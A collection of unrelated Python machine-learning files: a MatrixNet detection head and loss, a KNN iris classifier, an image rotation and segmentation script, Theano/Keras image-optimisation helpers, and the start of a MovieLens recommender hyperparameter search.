        self.features = features
        self.subnet_tl_corners_regr = SubNet(mode='tl_corners')
        self.subnet_br_corners_regr = SubNet(mode='br_corners')
        self.subnet_anchors_heats = SubNet(mode='objectness')

    def forward(self, x):
        # One prediction map per feature level; heatmaps pass through a
        # sigmoid, corner regressions stay raw.
        anchors_tl_corners_regr = [self.subnet_tl_corners_regr(feature) for feature in self.features]
        anchors_br_corners_regr = [self.subnet_br_corners_regr(feature) for feature in self.features]
        anchors_heatmaps = [_sigmoid(self.subnet_anchors_heats(feature)) for feature in self.features]
        return anchors_heatmaps, anchors_tl_corners_regr, anchors_br_corners_regr
# Box classification / regression prediction head.
class MatrixNetPredictor(nn.Module):
    """Final box head: per-RoI class scores and box-regression deltas.

    Fixes: ``nn.module`` -> ``nn.Module`` (AttributeError at class
    creation) and ``super(FastRCNNPredictor, ...)`` ->
    ``super(MatrixNetPredictor, ...)`` (FastRCNNPredictor is not defined
    in this module).

    :param in_channels: size of the flattened input feature vector
    :param num_classes: number of object classes (4 box deltas each)
    """

    def __init__(self, in_channels, num_classes):
        super(MatrixNetPredictor, self).__init__()
        self.cls_score = nn.Linear(in_channels, num_classes)
        self.bbox_pred = nn.Linear(in_channels, num_classes * 4)

    def forward(self, x):
        # Accept NxCx1x1 pooled features as well as already-flat NxC input.
        if x.dim() == 4:
            assert list(x.shape[2:]) == [1, 1]
        x = x.flatten(start_dim=1)
        scores = self.cls_score(x)
        bbox_deltas = self.bbox_pred(x)
        return scores, bbox_deltas
# Training/inference wrapper.
class model(nn.Module):
    """Training/inference wrapper around the two-stage MatrixNet.

    NOTE(review): ``MatrixNet2stage`` does not match the class defined
    above (``MatrixNet2Stage``), and it is called with 3 arguments while
    that constructor takes (classes, resnet, rpn_head, roi, layers) —
    confirm the intended constructor before running this.
    """
    def __init__(self, db):
        super(model, self).__init__()
        classes = db.configs["categories"]
        resnet = db.configs["backbone"]
        layers = db.configs["layers_range"]
        self.net = MatrixNet2stage(classes, resnet, layers)
        # Module-level _decode (defined below) performs test-time decoding.
        self._decode = _decode
    def _train(self, *xs):
        # xs[0][0]: image batch; xs[1]: per-level anchor indices.
        image = xs[0][0]
        anchors_inds = xs[1]
        outs = self.net.forward(image)
        # Gather corner regressions at the ground-truth anchor positions.
        for ind in range(len(anchors_inds)):
            outs[1][ind] = _tranpose_and_gather_feat(outs[1][ind], anchors_inds[ind])
            outs[2][ind] = _tranpose_and_gather_feat(outs[2][ind], anchors_inds[ind])
        return outs
    def _test(self, *xs, **kwargs):
        image = xs[0][0]
        outs = self.net.forward(image)
        return self._decode(*outs, **kwargs)
    def forward(self, *xs, **kwargs):
        # More than one positional argument implies training mode.
        if len(xs) > 1:
            return self._train(*xs, **kwargs)
        return self._test(*xs, **kwargs)
class MatrixNetAnchorsLoss(nn.Module):
    """Combined focal (heatmap) + regression (corner offset) loss, averaged
    over all feature levels.

    NOTE(review): ``corner_regr_weight`` and ``center_regr_weight`` are
    stored but never applied in forward() — confirm whether the weighted
    sum was intended.
    """
    def __init__(self, corner_regr_weight=1, center_regr_weight=0.1, focal_loss=_neg_loss):
        super(MatrixNetAnchorsLoss, self).__init__()
        self.corner_regr_weight = corner_regr_weight
        self.center_regr_weight = center_regr_weight
        self.focal_loss = focal_loss
        self.regr_loss = _regr_loss
    def forward(self, outs, targets):
        # focal loss
        focal_loss = 0
        corner_regr_loss = 0
        # Network outputs, one entry per feature level.
        anchors_heats = outs[0]
        anchors_tl_corners_regrs = outs[1]
        anchors_br_corners_regrs = outs[2]
        # Ground-truth targets, one entry per feature level.
        gt_anchors_heat = targets[0]
        gt_tl_corners_regr = targets[1]
        gt_br_corners_regr = targets[2]
        gt_mask = targets[3]
        # numf/numr: element counts used to normalise the two loss terms.
        numf = 0
        numr = 0
        for i in range(len(anchors_heats)):
            floss, num = self.focal_loss([anchors_heats[i]], gt_anchors_heat[i])
            focal_loss += floss
            numf += num
            rloss, num = self.regr_loss(anchors_br_corners_regrs[i], gt_br_corners_regr[i], gt_mask[i])
            numr += num
            corner_regr_loss += rloss
            rloss, num = self.regr_loss(anchors_tl_corners_regrs[i], gt_tl_corners_regr[i], gt_mask[i])
            numr += num
            corner_regr_loss += rloss
        if numr > 0:
            corner_regr_loss = corner_regr_loss / numr
        if numf > 0:
            focal_loss = focal_loss / numf
        loss = (focal_loss + corner_regr_loss)
        # Add a batch dimension for the surrounding training code.
        return loss.unsqueeze(0)
# Module-level loss instance — presumably picked up by the training
# harness; NOTE(review): confirm the consumer before renaming.
loss = MatrixNetAnchorsLoss()
# Detection decoding (prediction) routine.
def _decode(
    anchors_heats, corners_tl_regrs, corners_br_regrs,
    K=100, kernel=1, dist_threshold=0.2, num_dets=1000,layers_range = None,
    output_kernel_size = None, output_sizes = None, input_size=None, base_layer_range=None
):
    """Turn per-level heatmaps and corner regressions into detections.

    Returns a (batch, 300, 8) tensor of
    [x0, y0, x1, y1, score, score, score, class], with coordinates scaled
    to the first (largest) feature level.
    NOTE(review): ``kernel``, ``dist_threshold``, ``layers_range``,
    ``output_kernel_size``, ``output_sizes``, ``input_size`` and the
    ``top_k`` local are accepted but unused here — confirm before pruning.
    """
    top_k = K
    batch, cat, height_0, width_0 = anchors_heats[0].size()
    for i in range(len(anchors_heats)):
        anchors_heat = anchors_heats[i]
        corners_tl_regr = corners_tl_regrs[i]
        corners_br_regr = corners_br_regrs[i]
        batch, cat, height, width = anchors_heat.size()
        # Scale factors from this level back to level-0 coordinates.
        height_scale = height_0 / height
        width_scale = width_0 / width
        # Top-K peak positions in this level's heatmap.
        anchors_scores, anchors_inds, anchors_clses, anchors_ys, anchors_xs = _topk(anchors_heat, K=K)
        anchors_ys = anchors_ys.view(batch, K, 1)
        anchors_xs = anchors_xs.view(batch, K, 1)
        if corners_br_regr is not None:
            corners_tl_regr = _tranpose_and_gather_feat(corners_tl_regr, anchors_inds)
            corners_tl_regr = corners_tl_regr.view(batch, K, 1, 2)
            corners_br_regr = _tranpose_and_gather_feat(corners_br_regr, anchors_inds)
            corners_br_regr = corners_br_regr.view(batch, K, 1, 2)
            min_y, max_y, min_x, max_x = map(lambda x:x/8/2,base_layer_range) #This is the range of object sizes within the layers
            # We divide by 2 since we want to compute the distances from center to corners.
            tl_xs = anchors_xs - (((max_x - min_x) * corners_tl_regr[..., 0]) + (max_x + min_x)/2)
            tl_ys = anchors_ys - (((max_y - min_y) * corners_tl_regr[..., 1]) + (max_y + min_y)/2)
            br_xs = anchors_xs + (((max_x - min_x) * corners_br_regr[..., 0]) + (max_x + min_x)/2)
            br_ys = anchors_ys + (((max_y - min_y) * corners_br_regr[..., 1]) + (max_y + min_y)/2)
        bboxes = torch.stack((tl_xs, tl_ys, br_xs, br_ys), dim=3)
        scores = anchors_scores.view(batch, K, 1)
        # Invalidate boxes whose corners are inverted.
        width_inds = (br_xs < tl_xs)
        height_inds = (br_ys < tl_ys)
        scores[width_inds] = -1
        scores[height_inds] = -1
        scores = scores.view(batch, -1)
        scores, inds = torch.topk(scores, min(num_dets, scores.shape[1]))
        scores = scores.unsqueeze(2)
        bboxes = bboxes.view(batch, -1, 4)
        bboxes = _gather_feat(bboxes, inds)
        clses = anchors_clses.contiguous().view(batch, -1, 1)
        clses = _gather_feat(clses, inds).float()
        #
        # Rescale this level's boxes to level-0 coordinates.
        bboxes[:, :, 0] *= width_scale
        bboxes[:, :, 1] *= height_scale
        bboxes[:, :, 2] *= width_scale
        bboxes[:, :, 3] *= height_scale
        # Accumulate detections across levels.
        if i == 0:
            detections = torch.cat([bboxes, scores,scores,scores, clses], dim=2)
        else:
            detections = torch.cat([detections, torch.cat([bboxes, scores,scores,scores, clses], dim=2)], dim = 1)
    # Keep the 300 highest-scoring detections over all levels.
    top_scores, top_inds = torch.topk(detections[:, :, 4], 300)
    detections = _gather_feat(detections, top_inds)
    return detections
|
"""
k nearest neighbors

Euclidean distance: distance = sqrt((x1 - x2)^2 + (y1 - y2)^2 + (z1 - z3)^2)
If k is too small, the model is easily swayed by outliers.
If k is too large, the model is easily swayed by class imbalance.
Pros: no training phase needed; simple to use.
Cons: heavy computation, large memory footprint, and k is hard to tune.
"""
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.neighbors import KNeighborsClassifier
def knn_test():
    """Classify the iris dataset with k-nearest-neighbors.

    Features: sepal length/width, petal length/width.
    Classes: iris-setosa, iris-versicolour, iris-virginica.
    """
    # Load the data: `data` holds the feature values, `target` the labels.
    iris = load_iris()
    # print(iris)
    # Split the dataset:
    # train_test_split(features, targets, test_size=fraction, random_state=seed)
    # returns training features, test features, training targets, test targets.
    data_train, data_test, target_train, target_test = \
        train_test_split(iris.data, iris.target, test_size=0.2, random_state=4)
    ss = StandardScaler()
    # Standardize the training set so large-magnitude features don't dominate.
    data_train = ss.fit_transform(data_train)
    # Reuse the training set's mean and standard deviation for the test set,
    # so both sets are scaled identically: keep the fitted scaler `ss` and
    # call only transform() on the test data.
    data_test = ss.transform(data_test)
    # Build the KNN estimator; n_neighbors is the algorithm's k.
    k = KNeighborsClassifier(n_neighbors=3)
    # Fit the estimator on (training features, training targets).
    k.fit(data_train, target_train)
    # Predict labels for the test features with the trained estimator.
    target_predict = k.predict(data_test)
    print("原始数据的测试集的标签target_test是")
    print(target_test)
    print("训练得出的预估目标标签target_predict是")
    print(target_predict)
    # Compare predicted labels with the true test labels.
    print(target_predict == target_test)
    # Mean accuracy on the test data and labels.
    print(k.score(data_test, target_test))
    return None
# Run the demo when executed directly.
if __name__ == '__main__':
    knn_test()
|
<reponame>romybompart/Image-Processing-in-Sublime-Text-3<filename>Activity_11_0_Rotation_Dectection.py<gh_stars>1-10
import skimage
from skimage.color import rgb2gray
from skimage import data, io
import matplotlib.pyplot as plt
import matplotlib
# Global font size for all matplotlib figures in this script.
matplotlib.rcParams['font.size'] = 18
import numpy as np
import os
def kernel_creator(kernel_s, kernel_v=1, f_type=1):
    """Build a square convolution kernel of side *kernel_s*.

    :param kernel_v: weight for the centre (or the uniform weight, type 1)
    :param f_type: 1 low-pass, 2 low-pass with weighted centre and zeroed
        corners, 3 high-pass with weighted centre, 4 high-pass (-2 base,
        unit corners), 5 high-pass with zeroed corners, 6 horizontal
        segmentation edge, 7 vertical segmentation edge; anything else
        yields the scalar 0.
    """
    kernel = np.ones((kernel_s, kernel_s))
    mid = round((kernel_s - 1) / 2)
    last = kernel_s - 1
    if f_type == 1:  # uniform low-pass
        kernel *= kernel_v
    elif f_type == 2:  # low-pass, weighted centre, zeroed corners
        kernel[0, 0] = 0
        kernel[last, 0] = 0
        kernel[0, last] = 0
        kernel[mid, mid] = kernel_v
        kernel[last, last] = 0
    elif f_type == 3:  # high-pass with weighted centre
        kernel *= -1
        kernel[mid, mid] = kernel_v
    elif f_type == 4:  # high-pass, stronger negatives, unit corners
        kernel *= -2
        kernel[0, 0] = 1
        kernel[last, 0] = 1
        kernel[0, last] = 1
        kernel[mid, mid] = kernel_v
        kernel[last, last] = 1
    elif f_type == 5:  # high-pass variant with zeroed corners
        kernel *= -1
        kernel[0, 0] = 0
        kernel[last, 0] = 0
        kernel[0, last] = 0
        kernel[mid, mid] = kernel_v
        kernel[last, last] = 0
    elif f_type == 6:  # horizontal edge kernel for segmentation
        kernel *= 0
        kernel[mid, mid:] = -1
        kernel[mid, mid] = 1
    elif f_type == 7:  # vertical edge kernel for segmentation
        kernel *= 0
        kernel[:mid, mid] = -1
        kernel[mid, mid] = 1
    else:
        kernel = 0
    return kernel
def mediana(matrix):
    """Return the median of all values in *matrix*.

    Replaces a hand-rolled sort-and-pick implementation that assumed a
    square matrix (it computed the element count as shape[0]**2 and would
    mis-handle non-square input); np.median flattens any shape and handles
    both odd and even element counts correctly.
    """
    return np.median(matrix)
def pad_with(vector, pad_width, iaxis, kwargs):
    """np.pad callback: fill both margins of *vector* in place with the
    'padder' value from *kwargs* (default 0)."""
    fill = kwargs.get('padder', 0)
    vector[:pad_width[0]] = fill
    vector[-pad_width[1]:] = fill
def filter_application(image,kernel_size=3, kernel_value=1, filter_type=0):
    """Apply a spatial filter to *image* and return the filtered copy.

    :param kernel_size: side length of the square filter window
    :param kernel_value: centre weight / normalisation for type-3 kernels
    :param filter_type: 0 = median filter; otherwise a kernel_creator type
    NOTE(review): the median branch (type 0) slides over the UNPADDED
    image while other types use the padded one, so output sizes differ —
    confirm this asymmetry is intended.
    """
    if( round(kernel_size,0) <2):
        return "error: the kernel size should be higher than 3"
    print ("filter type: ", filter_type)
    if filter_type ==0 :
        # Median filter operates directly on the unpadded image.
        row, col = np.shape(image)
    else:
        kernel = kernel_creator (kernel_size,kernel_value,filter_type)
        print ( "...the kernel that you are using...")
        print ( kernel )
        padimage = np.pad(image,kernel_size, pad_with)
        row, col = np.shape(padimage)
    filtered_image = np.empty([row-kernel_size-1, col-kernel_size-1])
    for i in range(row-kernel_size-1):
        for j in range(col-kernel_size-1):
            if filter_type ==0:
                subm_ = image[ i:kernel_size+i , j:kernel_size+j]
                median = mediana(subm_)
                filtered_image[i,j] = median
            elif filter_type == 3:
                # High-pass: normalise by the centre weight only.
                subm_ = padimage[ i:kernel_size+i , j:kernel_size+j]
                mult_ = np.multiply(subm_,kernel)
                filter_ = np.sum(mult_) / kernel_value
                filtered_image[i,j] = filter_
            else:
                # Normalise by the sum of absolute kernel weights.
                subm_ = padimage[ i:kernel_size+i , j:kernel_size+j]
                mult_ = np.multiply(subm_,kernel)
                filter_ = np.sum(mult_) / np.sum(np.absolute(kernel))
                filtered_image[i,j] = filter_
    return filtered_image
def segmentation(image, kernel_s=3):
    """Edge segmentation: |horizontal response - vertical response| per
    window position over the padded image."""
    if round(kernel_s, 0) < 2:
        return "error: the kernel size should be higher than 3"
    horiz = kernel_creator(kernel_s, f_type=6)
    vert = kernel_creator(kernel_s, f_type=7)
    padded = np.pad(image, kernel_s, pad_with)
    rows, cols = np.shape(padded)
    out = np.empty([rows - kernel_s - 1, cols - kernel_s - 1])
    for r in range(rows - kernel_s - 1):
        for c in range(cols - kernel_s - 1):
            window = padded[r:kernel_s + r, c:kernel_s + c]
            out[r, c] = (np.sum(np.multiply(window, horiz))
                         - np.sum(np.multiply(window, vert)))
    return np.abs(out)
def varianzas(data,image):
    """Between-class variance for every candidate threshold (Otsu-style).

    :param data: histogram bin counts
    :param image: source image (only its total pixel count is used)
    NOTE(review): classic Otsu uses R1*R2*(m2-m1)**2; here the mean
    difference is not squared — confirm whether that is intentional.
    """
    L = len ( data )
    a, b = np.shape(image)
    ntp = a*b
    y = np.arange(L)
    Varianzas = np.zeros([L])
    for i in range (L):
        # R1/R2: pixel mass below/above threshold i; m1/m2: class means.
        R1 = sum ( data[0:i])
        R2 = ntp - R1
        if (R1 == 0):
            m1 = 0
        else:
            m1 = sum (data[0:i] * y[0:i])/R1
        if (R2==0):
            m2 =0
        else:
            m2 = sum ( data[i+1:L]*y[i+1:L])/R2
        Varianzas[i] = (R1*R2*(m2-m1))
    return Varianzas
def whereMax(vm):
    """Return the index of the first occurrence of the maximum value in
    *vm*.

    Rewritten from a manual scan: np.argmax returns the first maximal
    index, matching the old loop, and the old unreachable "error" string
    return is gone (it was only possible for empty input, where max()
    already raised — np.argmax raises ValueError there too).
    """
    return int(np.argmax(vm))
def histogram(image):
    """Count truncated pixel intensities into 255 bins (indices 0-254).

    NOTE(review): an 8-bit image needs 256 bins — a pixel equal to 255
    would raise IndexError here. Inputs coming from rgb2gray are floats in
    [0, 1], which all truncate to bin 0 — confirm the expected input range.
    """
    bins = np.zeros([255])
    a, b = np.shape(image)
    for k in range(a):
        for i in range (b):
            bins[round(int(image[k,i]),0)] = 1 + bins[round(int(image[k,i]),0)]
    return bins
def binarization(image, middle):
    """Threshold *image*: pixels >= *middle* become 255, the rest 0.

    Vectorized with np.where; the previous per-pixel Python double loop
    did the same work with interpreter overhead. The result is a float
    array, matching the old np.empty-based output dtype.
    """
    return np.where(image >= middle, 255.0, 0.0)
def optimal_binarization(image):
    """Binarize *image* at the threshold that maximises the between-class
    variance of its histogram (Otsu-style pipeline)."""
    his = histogram(image)
    vm = varianzas(his, image)
    pos_vm = whereMax(vm)
    binimage = binarization( image,pos_vm)
    return binimage
def area(image):
    # Sum of all pixel values; for a 0/1 mask this is the foreground area.
    return np.sum(image)
def invert(image):
    # Map a 0/255 binary image to 1/0 (dark pixels become 1).
    return np.abs((image/255) - 1)
def centroide(image):
    """Centroid (x, y) of the dark region of a 0/255 binary image, as the
    mean coordinate of the inverted mask's nonzero pixels."""
    image = invert(image)
    yis,xis = np.nonzero(image)
    x = xis.mean()
    y = yis.mean()
    return (x,y)
def centroide2(image):
    """Centroid (x, y) of the dark region via intensity-weighted sums.

    Vectorized: the old per-pixel Python double loop is replaced by
    index-weighted row/column sums (identical arithmetic —
    sum_i i * row_total_i == sum_ij i * image[i, j]).
    """
    rows, cols = np.shape(image)
    image = invert(image)
    area_ = area(image)
    y = np.sum(np.arange(rows) * image.sum(axis=1)) / area_
    x = np.sum(np.arange(cols) * image.sum(axis=0)) / area_
    return (x, y)
def signature(image, centroide_x, centroide_y):
    """Shape signature: distance from the centroid to every nonzero pixel.

    :return: (r, max_x, max_y) — r is the array of centroid-to-pixel
        distances; (max_x, max_y) is the absolute offset of the farthest
        pixel.
    """
    rows, cols = np.nonzero(image)
    dx = np.abs(cols - centroide_x)
    dy = np.abs(rows - centroide_y)
    dist = np.sqrt(dx ** 2 + dy ** 2)
    farthest = np.argmax(dist)
    return dist, dx[farthest], dy[farthest]
# Load the test image and convert it to grayscale.
filename = os.path.join('images/square_paint.png')
imageRGB = io.imread(filename)
#imageRGB = data.astronaut()
#plt.figure()
#plt.imshow(image)
#plt.show()
image = rgb2gray(imageRGB)
row, col = np.shape(image)
# Rotation angle in degrees and radians.
alpha = 45
alpha_rad = np.pi * alpha / 180
# Translation terms that keep the image centre fixed under rotation.
cx = col/2
cy = row/2
dx = cx - cx*np.cos(alpha_rad) - cy*np.sin(alpha_rad)
dy = cy + cx*np.sin(alpha_rad) - cy*np.cos(alpha_rad)
# 2x3 affine matrix: rotation plus centre-preserving translation.
rot_m = np.matrix([[np.cos(alpha_rad), np.sin(alpha_rad), dx],\
[-np.sin(alpha_rad), np.cos(alpha_rad), dy]])
# Rotate the four image corners (homogeneous coords) to find the bounds.
p0 = np.round(rot_m * np.array([0,0,1]).reshape(3,1),0).astype(int) # x0,y0
p1 = np.round(rot_m * np.array([col,0,1]).reshape(3,1),0).astype(int) # x1,y0
p2 = np.round(rot_m * np.array([0,row,1]).reshape(3,1),0).astype(int) # x0,y1
p3 = np.round(rot_m * np.array([col,row,1]).reshape(3,1),0).astype(int) # x0,y0
p = [p0,p1,p2,p3]
i=0
# Report the rotation parameters and the rotated corner positions.
print ("rotation ange...")
print ( str(alpha) + "degrees")
print ( "checking Rotated vertex...")
for items in p:
    print ("point : ", i)
    print ("x: {} , y: {}".format(items[0],items[1]))
    i+=1
print ( "image center...")
print ("x: {} , y: {}".format(cx,cy))
print ( "image size...")
print ("x: {} , y: {}".format(col,row))
# The bounding box of the rotated corners determines the output size.
a = np.array(p).reshape(4,2)
pmin = np.min(a,0)
pmax = np.max(a,0)
print ( "min point...")
print ( pmin )
print ( "max point...")
print ( pmax )
new_col = pmax[0]-pmin[0]
new_row = pmax[1]-pmin[1]
print ("the new image rotaged will have shape of")
print ("x: {}, y: {}".format(new_col, new_row))
# Forward-map every source pixel into the enlarged rotated canvas
# (background initialised to 1.0, i.e. white for a float grayscale image).
rot = np.ones((new_row,new_col))
#rot = np.ones((row+1,col+1))
for x in range ( col ):
    for y in range (row):
        p = np.round(rot_m * np.array([x,y,1]).reshape(3,1),0).astype(int)
        # Shift by the bounding-box minimum so indices are non-negative.
        x_ = p[0] + np.abs(pmin[0])
        y_ = p[1] + np.abs(pmin[1])
        try:
            rot[y_,x_] = image[y,x]
        except:
            # Rounded targets can land just outside the canvas; skip them.
            pass
            #print ("x = {}, y = {}, x_ = {}, y_ = {}".format(x,y,x_,y_))
# Median filter fills the pinholes left by forward mapping.
rot = filter_application(rot,kernel_size=3,filter_type=0)
# Crop back to the original image size, centred in the rotated canvas.
# NOTE(review): x1/x2 come from column counts but index rows (and vice
# versa); this only matches for square images — confirm.
x1 = int((new_col-col)/2)
x2 = int(new_col - x1)
y1 = int((new_row-row)/2)
y2 = int(new_row - y1)
rot = rot[x1:x2,y1:y2]
plt.figure()
plt.subplot(1,2,1)
plt.title("Original")
plt.imshow(image, cmap='gray')
plt.subplot(1,2,2)
plt.title("Rotated")
plt.imshow(rot, cmap='gray')
plt.show()
oseg = segmentation (image, kernel_s = 3)
rseg = segmentation (rot, kernel_s = 3)
cen_o_x, cen_o_y = centroide(image)
osig , xmax_o, ymax_o = signature(oseg,cen_o_x, cen_o_y)
rsig , xmax_r, ymax_r = signature(rseg,cen_o_x, cen_o_y)
plt.plot(osig, 'r')
y_c = np.ones(np.shape(osig)[0])*np.average(osig)
y_line = np.arange(0, np.shape(osig)[0], 1)
plt.plot(y_line, y_c, 'y--')
plt.show()
plt.figure()
plt.subplot(1,3,1)
plt.title("Segmented 1 ")
plt.imshow(oseg, cmap='gray')
plt.subplot(1,3,2)
plt.title("Segmented 2")
plt.imshow(rseg, cmap='gray')
plt.subplot(1,3,3)
plt.title("signature")
plt.plot(osig, 'r')
y_c = np.ones(np.shape(osig)[0])*np.average(osig)
y_line = np.arange(0, np.shape(osig)[0], 1)
plt.plot(y_line, y_c, 'y--')
plt.tight_layout(pad=0.4, w_pad=0.5)
plt.show()
dx1 = xmax_o -cen_o_x
dy1 = ymax_o-cen_o_y
tetha1=np.degrees(np.arctan(dy1/dx1))
dx2 = xmax_r-cen_o_x
dy2 = ymax_r-cen_o_y
tetha2=np.degrees(np.arctan(dy2/dx2))
tetha = tetha2-tetha1
print ( "rotation")
print(tetha) |
import sys
import theano
import theano.tensor as T
import numpy as np
from scipy.misc import imread, imsave, imresize
from scipy.ndimage.filters import median_filter
from keras.applications import VGG16, VGG19, ResNet50
# Theano's configured float dtype (e.g. "float32"); all image arrays
# below are cast to this type.
floatX = theano.config.floatX

# Maps CLI-friendly model names to their Keras application classes.
models_table = {
    "vgg16": VGG16,
    "vgg19": VGG19,
    "resnet50": ResNet50,
}
def subtract_imagenet_mean(img):
    """Subtract the ImageNet channel means in place from a BGR image."""
    bgr_means = (103.939, 116.779, 123.68)
    for channel, mean in enumerate(bgr_means):
        img[channel, :, :] -= mean
def add_imagenet_mean(img):
    """Add the ImageNet channel means in place to a BGR image."""
    bgr_means = (103.939, 116.779, 123.68)
    for channel, mean in enumerate(bgr_means):
        img[channel, :, :] += mean
def load_and_preprocess_img(filename, size=None, center_crop=False):
    """Load an image and pre-process it for the ImageNet models.

    Optionally center-crops to a square and/or resizes so the longer
    side equals ``size``.  Returns a (1, 3, H, W) BGR array of dtype
    ``floatX`` with the ImageNet mean subtracted.  Exits the process
    if the file cannot be read.
    """
    try:
        img = imread(filename, mode="RGB")
    except OSError as e:
        print(e)
        sys.exit(1)
    if center_crop:
        # Keep the central square of side min(H, W).
        height, width = img.shape[:2]
        short = min(height, width)
        offset = int((max(height, width) - short) / 2.)
        window = slice(offset, offset + short)
        if short == height:
            img = img[:, window, :]
        else:
            img = img[window, :, :]
    if size is not None:
        # Scale so the longer side becomes `size`, preserving aspect.
        height, width = img.shape[:2]
        short = min(height, width)
        scaled_short = int(size / (max(height, width) / float(short)))
        if short == height:
            img = imresize(img, (scaled_short, size))
        else:
            img = imresize(img, (size, scaled_short))
    # Channels-first, RGB -> BGR, cast, subtract the ImageNet mean.
    img = img.transpose((2, 0, 1))[::-1].astype(floatX)
    subtract_imagenet_mean(img)
    return img[np.newaxis, :]
def deprocess_img_and_save(img, filename):
    """Undo model pre-processing on *img* and write it to *filename*."""
    img = img[0, :, :, :]  # drop the batch axis
    add_imagenet_mean(img)
    # BGR -> RGB, channels-last, clamp to the valid 8-bit pixel range.
    img = img[::-1].transpose((1, 2, 0))
    img = np.clip(img, 0, 255).astype(np.uint8)
    # Light per-channel median filtering to remove isolated pixel noise.
    img = median_filter(img, size=(3, 3, 1))
    try:
        imsave(filename, img)
    except OSError as e:
        print(e)
        sys.exit(1)
def get_adam_updates(f, params, lr=10., b1=0.9, b2=0.999, e=1e-8, dec=5e-3, norm_grads=False):
    """Generate updates to optimize using the Adam optimizer with linear learning rate decay."""
    # Shared step counter t plus per-parameter first (m) and second (v)
    # moment accumulators, zero-initialised with the parameter shapes.
    t = theano.shared(0)
    ms = [theano.shared(np.zeros(param.shape.eval(), dtype=floatX), borrow=True) for param in params]
    vs = [theano.shared(np.zeros(param.shape.eval(), dtype=floatX), borrow=True) for param in params]
    gs = T.grad(f, params)
    if norm_grads:
        # Optionally L1-normalise each gradient (epsilon avoids 0/0).
        gs = [g / (T.sum(T.abs_(g)) + 1e-8) for g in gs]
    t_u = (t, t + 1)
    # Exponential moving averages of the gradient and squared gradient.
    m_us = [(m, b1 * m + (1. - b1) * g) for m, g in zip(ms, gs)]
    v_us = [(v, b2 * v + (1. - b2) * T.sqr(g)) for v, g in zip(vs, gs)]
    t_u_f = T.cast(t_u[1], floatX)
    # Bias-corrected step size with linear decay 1/(1 + t*dec).
    lr_hat = (lr / (1. + t_u_f * dec)) * T.sqrt(1. - T.pow(b2, t_u_f)) / (1. - T.pow(b1, t_u_f))
    # Standard Adam parameter step using the *updated* moments.
    param_us = [(param, param - lr_hat * m_u[1] / (T.sqrt(v_u[1]) + e)) for m_u, v_u, param in zip(m_us, v_us, params)]
    return m_us + v_us + param_us + [t_u]
|
from math import floor, ceil
from time import time
from pathlib import Path
from zipfile import ZipFile
from urllib.request import urlretrieve
from contextlib import contextmanager
import random
from pprint import pprint
import json
import numpy as np
import pandas as pd
import joblib
from sklearn.model_selection import ParameterGrid
from sklearn.model_selection import train_test_split
from sklearn.metrics import mean_squared_error
from sklearn.metrics import mean_absolute_error
import tensorflow as tf
from keras.layers import Input, Embedding, Flatten, merge, Dense, Dropout
from keras.layers import BatchNormalization
from keras.models import Model
from dask import delayed, compute
DEFAULT_LOSS = 'cross_entropy'

# MovieLens 100K dataset location and local cache names.
ML_100K_URL = "http://files.grouplens.org/datasets/movielens/ml-100k.zip"
ML_100K_FILENAME = Path(ML_100K_URL.rsplit('/', 1)[1])
ML_100K_FOLDER = Path('ml-100k')

# Per-checkpoint artifact names written under results/<digest>/<epochs>/.
RESULTS_FILENAME = 'results.json'
MODEL_FILENAME = 'model.h5'

# Download and unpack the dataset once; later runs reuse the local copy.
if not ML_100K_FILENAME.exists():
    print('Downloading %s to %s...' % (ML_100K_URL, ML_100K_FILENAME))
    urlretrieve(ML_100K_URL, ML_100K_FILENAME.name)
if not ML_100K_FOLDER.exists():
    print('Extracting %s to %s...' % (ML_100K_FILENAME, ML_100K_FOLDER))
    ZipFile(ML_100K_FILENAME.name).extractall('.')

# u.data is tab-separated: user, item, rating, timestamp.
all_ratings = pd.read_csv(ML_100K_FOLDER / 'u.data', sep='\t',
                          names=["user_id", "item_id", "rating", "timestamp"])

# Hyper-parameters used when a key is absent from a search-space sample.
DEFAULT_PARAMS = dict(
    embedding_size=16,
    hidden_size=64,
    n_hidden=4,
    dropout_embedding=0.3,
    dropout_hidden=0.3,
    use_batchnorm=True,
    loss=DEFAULT_LOSS,
    optimizer='adam',
    batch_size=64,
)

# Grid axes shared by both branches of the search space below.
COMMON_SEARCH_SPACE = dict(
    embedding_size=[16, 32, 64, 128],
    dropout_embedding=[0, 0.2, 0.5],
    dropout_hidden=[0, 0.2, 0.5],
    use_batchnorm=[True, False],
    loss=['mse', 'mae', 'cross_entropy'],
    batch_size=[16, 32, 64, 128],
)

# Two sub-grids: a no-hidden-layer baseline and deeper MLP variants.
SEARCH_SPACE = [
    dict(n_hidden=[0], **COMMON_SEARCH_SPACE),
    dict(n_hidden=[1, 2, 3, 4, 5],
         hidden_size=[32, 64, 128, 256, 512],
         **COMMON_SEARCH_SPACE),
]
def bootstrap_ci(func, data_args, ci_range=(0.025, 0.975), n_iter=10000,
                 random_state=0):
    """Bootstrap confidence interval for ``func(*data_args)``.

    Parameters
    ----------
    func : callable applied to each resampled version of ``data_args``.
    data_args : sequence of equal-length arrays, resampled jointly
        along their first axis.
    ci_range : (low, high) quantiles of the bootstrap distribution.
    n_iter : number of bootstrap resamples.
    random_state : seed for the resampling RNG (results deterministic).

    Returns
    -------
    (low, high) : the requested empirical quantiles of the statistic.
    """
    rng = np.random.RandomState(random_state)
    n_samples = data_args[0].shape[0]
    results = []
    for _ in range(n_iter):
        # Sample n_samples indices with replacement.  randint's upper
        # bound is exclusive, so it must be n_samples: the previous
        # n_samples - 1 could never resample the last observation.
        idx = rng.randint(0, n_samples, n_samples)
        resampled_args = [np.asarray(arg)[idx] for arg in data_args]
        results.append(func(*resampled_args))
    results = np.sort(results)
    return (results[floor(ci_range[0] * n_iter)],
            results[ceil(ci_range[1] * n_iter)])
def make_model(user_input_dim, item_input_dim,
               embedding_size=16, hidden_size=64, n_hidden=4,
               dropout_embedding=0.3, dropout_hidden=0.3,
               optimizer='adam', loss=DEFAULT_LOSS, use_batchnorm=True,
               **ignored_args):
    """Build and compile the rating-prediction network.

    Embeds user and item ids, concatenates the embeddings and stacks
    ``n_hidden`` dense layers.  With ``loss == 'cross_entropy'`` the
    head is a 5-way softmax over rating classes; otherwise a single
    linear output trained with the given regression loss.

    Extra keyword arguments (e.g. search-space keys such as
    ``batch_size``) are accepted and ignored so the full parameter
    dict can be splatted in.
    """
    user_id_input = Input(shape=[1], name='user')
    item_id_input = Input(shape=[1], name='item')
    user_embedding = Embedding(output_dim=embedding_size,
                               input_dim=user_input_dim,
                               input_length=1,
